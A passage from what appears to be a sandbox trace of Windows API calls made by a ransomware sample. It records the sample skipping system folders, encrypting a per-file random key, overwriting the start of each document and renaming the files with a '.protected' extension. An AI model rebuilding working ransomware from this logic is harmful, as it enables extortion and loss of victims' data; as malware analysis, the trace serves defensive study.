(lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Eze0cP.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\eze0cp.docx"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Eze0cP.docx.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\eze0cp.docx.protected")) returned 1 [0091.346] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0091.346] lstrcmpiW (lpString1="fNOz68wIWXN.xlsx", lpString2="Windows") returned -1 [0091.346] lstrcmpiW (lpString1="fNOz68wIWXN.xlsx", lpString2="Program Files") returned -1 [0091.346] lstrcmpiW (lpString1="fNOz68wIWXN.xlsx", lpString2="Program Files (x86)") returned -1 [0091.346] lstrcmpiW (lpString1="fNOz68wIWXN.xlsx", lpString2="$Recycle.bin") returned 1 [0091.346] lstrcmpiW (lpString1="fNOz68wIWXN.xlsx", lpString2="System Volume Information") returned -1 [0091.346] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\fNOz68wIWXN.xlsx") returned 60 [0091.346] StrStrIW (lpFirst="fNOz68wIWXN.xlsx", lpSrch=".protected") returned 0x0 [0091.346] lstrcmpW (lpString1="fNOz68wIWXN.xlsx", lpString2="RESTORE_FILES.txt") returned -1 [0091.346] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0091.346] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0091.346] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\fNOz68wIWXN.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\fnoz68wiwxn.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0091.347] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\Documents\\fNOz68wIWXN.xlsx") returned 60 [0091.347] StrStrW (lpFirst="fNOz68wIWXN.xlsx", lpSrch=".txt") returned 0x0 [0091.347] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\fNOz68wIWXN.xlsx") returned 60 [0091.347] StrStrW (lpFirst="fNOz68wIWXN.xlsx", lpSrch=".rar") returned 0x0 [0091.347] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\fNOz68wIWXN.xlsx") returned 60 [0091.347] StrStrW (lpFirst="fNOz68wIWXN.xlsx", lpSrch=".zip") returned 0x0 [0091.347] ReadFile (in: hFile=0xb4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0091.347] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.347] WriteFile (in: hFile=0xb4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0091.347] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.348] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0091.348] WriteFile (in: hFile=0xb4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0091.348] CloseHandle (hObject=0xb4) returned 1 [0091.348] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\fNOz68wIWXN.xlsx.protected") returned 70 [0091.348] 
MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\fNOz68wIWXN.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\fnoz68wiwxn.xlsx"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\fNOz68wIWXN.xlsx.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\fnoz68wiwxn.xlsx.protected")) returned 1 [0091.348] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0091.348] lstrcmpiW (lpString1="Fpi-hpaGQfns2ZWfpN.docx", lpString2="Windows") returned -1 [0091.348] lstrcmpiW (lpString1="Fpi-hpaGQfns2ZWfpN.docx", lpString2="Program Files") returned -1 [0091.348] lstrcmpiW (lpString1="Fpi-hpaGQfns2ZWfpN.docx", lpString2="Program Files (x86)") returned -1 [0091.348] lstrcmpiW (lpString1="Fpi-hpaGQfns2ZWfpN.docx", lpString2="$Recycle.bin") returned 1 [0091.348] lstrcmpiW (lpString1="Fpi-hpaGQfns2ZWfpN.docx", lpString2="System Volume Information") returned -1 [0091.348] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Fpi-hpaGQfns2ZWfpN.docx") returned 67 [0091.348] StrStrIW (lpFirst="Fpi-hpaGQfns2ZWfpN.docx", lpSrch=".protected") returned 0x0 [0091.348] lstrcmpW (lpString1="Fpi-hpaGQfns2ZWfpN.docx", lpString2="RESTORE_FILES.txt") returned -1 [0091.349] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0091.349] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0091.349] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Fpi-hpaGQfns2ZWfpN.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\fpi-hpagqfns2zwfpn.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, 
dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0091.349] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Fpi-hpaGQfns2ZWfpN.docx") returned 67 [0091.349] StrStrW (lpFirst="Fpi-hpaGQfns2ZWfpN.docx", lpSrch=".txt") returned 0x0 [0091.349] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Fpi-hpaGQfns2ZWfpN.docx") returned 67 [0091.349] StrStrW (lpFirst="Fpi-hpaGQfns2ZWfpN.docx", lpSrch=".rar") returned 0x0 [0091.349] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Fpi-hpaGQfns2ZWfpN.docx") returned 67 [0091.349] StrStrW (lpFirst="Fpi-hpaGQfns2ZWfpN.docx", lpSrch=".zip") returned 0x0 [0091.349] ReadFile (in: hFile=0xb4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0091.350] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.350] WriteFile (in: hFile=0xb4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0091.350] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.350] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0091.350] WriteFile (in: hFile=0xb4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0091.350] CloseHandle (hObject=0xb4) returned 1 [0091.350] wnsprintfW (in: 
pszDest=0x4695e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Fpi-hpaGQfns2ZWfpN.docx.protected") returned 77 [0091.350] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Fpi-hpaGQfns2ZWfpN.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\fpi-hpagqfns2zwfpn.docx"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Fpi-hpaGQfns2ZWfpN.docx.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\fpi-hpagqfns2zwfpn.docx.protected")) returned 1 [0091.351] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0091.351] lstrcmpiW (lpString1="G3B8tom4OzzScCf6Iq4t.rtf", lpString2="Windows") returned -1 [0091.351] lstrcmpiW (lpString1="G3B8tom4OzzScCf6Iq4t.rtf", lpString2="Program Files") returned -1 [0091.351] lstrcmpiW (lpString1="G3B8tom4OzzScCf6Iq4t.rtf", lpString2="Program Files (x86)") returned -1 [0091.351] lstrcmpiW (lpString1="G3B8tom4OzzScCf6Iq4t.rtf", lpString2="$Recycle.bin") returned 1 [0091.351] lstrcmpiW (lpString1="G3B8tom4OzzScCf6Iq4t.rtf", lpString2="System Volume Information") returned -1 [0091.351] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\G3B8tom4OzzScCf6Iq4t.rtf") returned 68 [0091.351] StrStrIW (lpFirst="G3B8tom4OzzScCf6Iq4t.rtf", lpSrch=".protected") returned 0x0 [0091.351] lstrcmpW (lpString1="G3B8tom4OzzScCf6Iq4t.rtf", lpString2="RESTORE_FILES.txt") returned -1 [0091.351] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0091.351] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0091.351] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\Documents\\G3B8tom4OzzScCf6Iq4t.rtf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\g3b8tom4ozzsccf6iq4t.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0091.351] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\G3B8tom4OzzScCf6Iq4t.rtf") returned 68 [0091.351] StrStrW (lpFirst="G3B8tom4OzzScCf6Iq4t.rtf", lpSrch=".txt") returned 0x0 [0091.351] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\G3B8tom4OzzScCf6Iq4t.rtf") returned 68 [0091.351] StrStrW (lpFirst="G3B8tom4OzzScCf6Iq4t.rtf", lpSrch=".rar") returned 0x0 [0091.351] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\G3B8tom4OzzScCf6Iq4t.rtf") returned 68 [0091.351] StrStrW (lpFirst="G3B8tom4OzzScCf6Iq4t.rtf", lpSrch=".zip") returned 0x0 [0091.351] ReadFile (in: hFile=0xb4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0091.352] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.352] WriteFile (in: hFile=0xb4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0091.352] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.352] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0091.352] WriteFile (in: hFile=0xb4, lpBuffer=0x48ea38*, 
nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0091.352] CloseHandle (hObject=0xb4) returned 1 [0091.352] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\G3B8tom4OzzScCf6Iq4t.rtf.protected") returned 78 [0091.352] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\G3B8tom4OzzScCf6Iq4t.rtf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\g3b8tom4ozzsccf6iq4t.rtf"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\G3B8tom4OzzScCf6Iq4t.rtf.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\g3b8tom4ozzsccf6iq4t.rtf.protected")) returned 1 [0091.353] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0091.353] lstrcmpiW (lpString1="G9rIfRF_pwUh.doc", lpString2="Windows") returned -1 [0091.353] lstrcmpiW (lpString1="G9rIfRF_pwUh.doc", lpString2="Program Files") returned -1 [0091.353] lstrcmpiW (lpString1="G9rIfRF_pwUh.doc", lpString2="Program Files (x86)") returned -1 [0091.353] lstrcmpiW (lpString1="G9rIfRF_pwUh.doc", lpString2="$Recycle.bin") returned 1 [0091.353] lstrcmpiW (lpString1="G9rIfRF_pwUh.doc", lpString2="System Volume Information") returned -1 [0091.353] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\G9rIfRF_pwUh.doc") returned 60 [0091.353] StrStrIW (lpFirst="G9rIfRF_pwUh.doc", lpSrch=".protected") returned 0x0 [0091.353] lstrcmpW (lpString1="G9rIfRF_pwUh.doc", lpString2="RESTORE_FILES.txt") returned -1 [0091.353] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0091.353] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, 
pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0091.353] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\G9rIfRF_pwUh.doc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\g9rifrf_pwuh.doc"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0091.354] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\G9rIfRF_pwUh.doc") returned 60 [0091.354] StrStrW (lpFirst="G9rIfRF_pwUh.doc", lpSrch=".txt") returned 0x0 [0091.354] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\G9rIfRF_pwUh.doc") returned 60 [0091.354] StrStrW (lpFirst="G9rIfRF_pwUh.doc", lpSrch=".rar") returned 0x0 [0091.354] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\G9rIfRF_pwUh.doc") returned 60 [0091.354] StrStrW (lpFirst="G9rIfRF_pwUh.doc", lpSrch=".zip") returned 0x0 [0091.354] ReadFile (in: hFile=0xb4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0091.354] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.354] WriteFile (in: hFile=0xb4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0091.354] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.355] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, 
lpOverlapped=0x0) returned 1 [0091.355] WriteFile (in: hFile=0xb4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0091.355] CloseHandle (hObject=0xb4) returned 1 [0091.355] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\G9rIfRF_pwUh.doc.protected") returned 70 [0091.355] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\G9rIfRF_pwUh.doc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\g9rifrf_pwuh.doc"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\G9rIfRF_pwUh.doc.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\g9rifrf_pwuh.doc.protected")) returned 1 [0091.356] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0091.356] lstrcmpiW (lpString1="L cM5A.pdf", lpString2="Windows") returned -1 [0091.356] lstrcmpiW (lpString1="L cM5A.pdf", lpString2="Program Files") returned -1 [0091.356] lstrcmpiW (lpString1="L cM5A.pdf", lpString2="Program Files (x86)") returned -1 [0091.356] lstrcmpiW (lpString1="L cM5A.pdf", lpString2="$Recycle.bin") returned 1 [0091.356] lstrcmpiW (lpString1="L cM5A.pdf", lpString2="System Volume Information") returned -1 [0091.356] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\L cM5A.pdf") returned 54 [0091.356] StrStrIW (lpFirst="L cM5A.pdf", lpSrch=".protected") returned 0x0 [0091.356] lstrcmpW (lpString1="L cM5A.pdf", lpString2="RESTORE_FILES.txt") returned -1 [0091.356] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0091.356] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, 
pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0091.356] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\L cM5A.pdf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\l cm5a.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0091.356] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\L cM5A.pdf") returned 54 [0091.357] StrStrW (lpFirst="L cM5A.pdf", lpSrch=".txt") returned 0x0 [0091.357] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\L cM5A.pdf") returned 54 [0091.357] StrStrW (lpFirst="L cM5A.pdf", lpSrch=".rar") returned 0x0 [0091.357] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\L cM5A.pdf") returned 54 [0091.357] StrStrW (lpFirst="L cM5A.pdf", lpSrch=".zip") returned 0x0 [0091.357] ReadFile (in: hFile=0xb4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0091.357] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.357] WriteFile (in: hFile=0xb4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0091.357] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.357] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0091.358] WriteFile 
(in: hFile=0xb4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0091.358] CloseHandle (hObject=0xb4) returned 1 [0091.358] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\L cM5A.pdf.protected") returned 64 [0091.358] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\L cM5A.pdf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\l cm5a.pdf"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\L cM5A.pdf.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\l cm5a.pdf.protected")) returned 1 [0091.358] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0091.358] lstrcmpiW (lpString1="Mxlov", lpString2="Windows") returned -1 [0091.358] lstrcmpiW (lpString1="Mxlov", lpString2="Program Files") returned -1 [0091.359] lstrcmpiW (lpString1="Mxlov", lpString2="Program Files (x86)") returned -1 [0091.359] lstrcmpiW (lpString1="Mxlov", lpString2="$Recycle.bin") returned 1 [0091.359] lstrcmpiW (lpString1="Mxlov", lpString2="System Volume Information") returned -1 [0091.359] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Mxlov") returned 49 [0091.359] lstrcmpW (lpString1="Mxlov", lpString2=".") returned 1 [0091.359] lstrcmpW (lpString1="Mxlov", lpString2="..") returned 1 [0091.359] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Mxlov\\*") returned 51 [0091.359] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Mxlov\\*", lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0x47b9d0 [0091.359] lstrcmpiW 
(lpString1=".", lpString2="Windows") returned -1 [0091.359] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0091.359] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0091.359] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0091.359] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0091.359] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Mxlov\\.") returned 51 [0091.359] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0091.359] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0091.359] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0091.359] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0091.359] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0091.359] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0091.359] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0091.359] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Mxlov\\..") returned 52 [0091.359] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0091.359] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0091.359] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0091.359] lstrcmpiW (lpString1="0arOslpnViit7wH.odt", lpString2="Windows") returned -1 [0091.359] lstrcmpiW (lpString1="0arOslpnViit7wH.odt", lpString2="Program Files") returned -1 [0091.359] lstrcmpiW (lpString1="0arOslpnViit7wH.odt", lpString2="Program Files (x86)") returned -1 [0091.359] lstrcmpiW (lpString1="0arOslpnViit7wH.odt", lpString2="$Recycle.bin") returned 1 [0091.359] lstrcmpiW (lpString1="0arOslpnViit7wH.odt", lpString2="System Volume Information") 
